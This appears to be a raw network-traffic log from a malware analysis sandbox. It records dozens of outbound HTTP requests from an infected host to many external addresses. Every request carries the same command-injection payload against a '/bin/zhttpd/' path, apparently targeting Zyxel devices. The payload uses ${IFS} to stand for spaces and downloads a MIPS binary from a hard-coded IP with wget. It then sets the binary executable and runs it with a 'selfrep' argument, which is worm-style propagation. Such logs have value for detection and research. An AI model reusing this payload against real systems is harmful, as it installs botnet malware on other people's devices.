                                                Jan 12, 2024 18:23:52.306160927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                203192.168.2.1347378177.73.24.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306174994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                204192.168.2.1338584110.75.247.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306184053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                205192.168.2.1350818195.25.15.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306204081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                206192.168.2.134370654.8.46.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306217909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                207192.168.2.1349886184.163.42.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306364059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                208192.168.2.134078858.156.62.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306390047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                209192.168.2.135141049.239.42.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306390047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                210192.168.2.135259257.50.203.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306391954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                211192.168.2.134103223.160.16.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306394100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                212192.168.2.133486893.241.160.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306400061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                213192.168.2.1351276130.70.52.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306415081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                214192.168.2.133890497.160.138.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306494951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                215192.168.2.1355774190.183.148.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306495905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                216192.168.2.1360192158.18.31.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306495905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                217192.168.2.134783227.32.253.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306596994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                218192.168.2.134998068.195.192.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306596041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                219192.168.2.1335394174.235.171.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306596041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                220192.168.2.1353910158.53.240.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306621075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                221192.168.2.1359572186.0.147.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306723118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                222192.168.2.135981899.146.75.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306723118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                223192.168.2.134744496.5.159.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306792021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                224192.168.2.136026270.2.118.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306804895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                225192.168.2.1335358200.229.0.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306807995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                226192.168.2.1344288117.173.250.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306855917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                227192.168.2.1344170143.1.126.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306874037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                228192.168.2.134582254.108.143.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306874990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                229192.168.2.135931218.35.22.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306874990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                230192.168.2.1337824219.9.117.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306910992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                231192.168.2.1352050219.236.220.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306916952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                232192.168.2.133503877.169.126.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.306961060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                233192.168.2.1344708174.148.103.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307024002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                234192.168.2.133316891.188.209.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307024002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                235192.168.2.1336620182.65.153.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307045937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                236192.168.2.1354710202.74.224.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307069063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                237192.168.2.1357794117.103.176.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307209969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                238192.168.2.1358506188.173.93.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307209969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                239192.168.2.1359718162.218.204.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307245016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                240192.168.2.13538065.213.182.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307245970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                241192.168.2.1357692141.95.69.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307269096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                242192.168.2.1345236121.58.93.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307271004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                243192.168.2.1337054140.181.244.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307292938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                244192.168.2.1353390193.221.128.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307308912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                245192.168.2.1355000158.148.202.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307308912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                246192.168.2.1359842132.227.46.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307332039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                247192.168.2.1343864183.191.18.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307369947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                248192.168.2.133704048.199.123.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307387114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                249192.168.2.1351720205.90.55.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307424068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                250192.168.2.1359606211.212.113.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307449102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                251192.168.2.1341260145.254.38.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.307522058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                252192.168.2.1341974120.78.119.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:53.313977003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                253192.168.2.134361291.88.82.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:53.314084053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                254192.168.2.133958632.209.8.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:53.314084053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                255192.168.2.1346264155.110.42.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:53.314161062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                256192.168.2.135599654.41.79.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:53.322594881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                257192.168.2.1339510138.115.106.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:53.322666883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                258192.168.2.1334650217.128.64.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.325880051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                259192.168.2.133640885.107.64.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.325925112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                260192.168.2.134397051.34.2.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.325944901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                261192.168.2.135768025.186.252.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.325958967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                262192.168.2.1336240165.155.159.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.325982094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                263192.168.2.1339316124.174.69.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326041937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                264192.168.2.1347784105.156.239.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326065063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                265192.168.2.133425251.14.52.232443
                                                TimestampBytes transferredDirectionData
